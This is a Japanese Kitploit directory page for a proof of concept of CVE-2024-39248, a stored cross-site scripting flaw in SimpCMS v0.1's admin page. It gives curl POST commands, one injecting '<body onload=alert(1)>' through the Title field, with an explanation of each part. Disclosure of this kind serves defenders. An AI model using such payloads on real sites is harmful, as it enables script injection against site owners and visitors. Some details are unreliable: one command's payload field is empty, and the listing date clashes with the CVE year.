Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-39248 — SimpCMS v0.1 におけるクロスサイトスクリプティング (XSS) の公開 - /SimpCMS/admin.php | Kitploit
ツール/GitHubGitHub/jasonthename/cve-2024-39248
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubjasonthename/cve-2024-39248

CVE-2024-39248

SimpCMS v0.1 におけるクロスサイトスクリプティング (XSS) の公開 - /SimpCMS/admin.php

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

エクスプロイトタイトル: SimpCMS v0.1 - クロスサイトスクリプティング (XSS)

CVE: CVE-2024-39248

エクスプロイト作成者: Jason Jacobs (0xjason_jacobs - Twitter)

ベンダーホームページ: https://sourceforge.net/projects/simpcms/

脆弱なエンドポイント: /SimpCMS/admin.php

SimpCMS v0.1 のクロスサイトスクリプティング (XSS) 脆弱性により、攻撃者は /admin.php の Title フィールドに注入された細工されたペイロードを介して、任意の Web スクリプトまたは HTML を実行できます。

SourceForge で公開されている SimpCMS バージョン用の更新された cURL コマンドパラメータ:

SimpCMS の管理インターフェースにログインしたら、ブラウザのインスペクタ要素の Application タブで確認した各 Cookie 値をコピーし、次の curl リクエストを送信します:

curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"

command

poc

初期の CVE 提出時のパラメータ (同じエクスプロイトが動作します):

SimpCMS ソフトウェアで観測された初期パラメータでは以下の cURL コマンドが生成されましたが、後に更新されました:

curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"

説明:

  • curl: URL でデータを転送するためのコマンドラインツール。
  • -X POST: 使用するリクエストメソッドを指定します (POST)。
  • "http://site.com/SimpCMS/admin.php": リクエストの送信先 URL。
  • -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - POST リクエストのペイロード。

このコマンドをターミナルで実行して、XSS ペイロードを含む POST リクエストを送信します。 /SimpCMS メインサイトにアクセスすると、XSS が表示されます。

CWE: https://cwe.mitre.org/data/definitions/79.html

ツールをダウンロード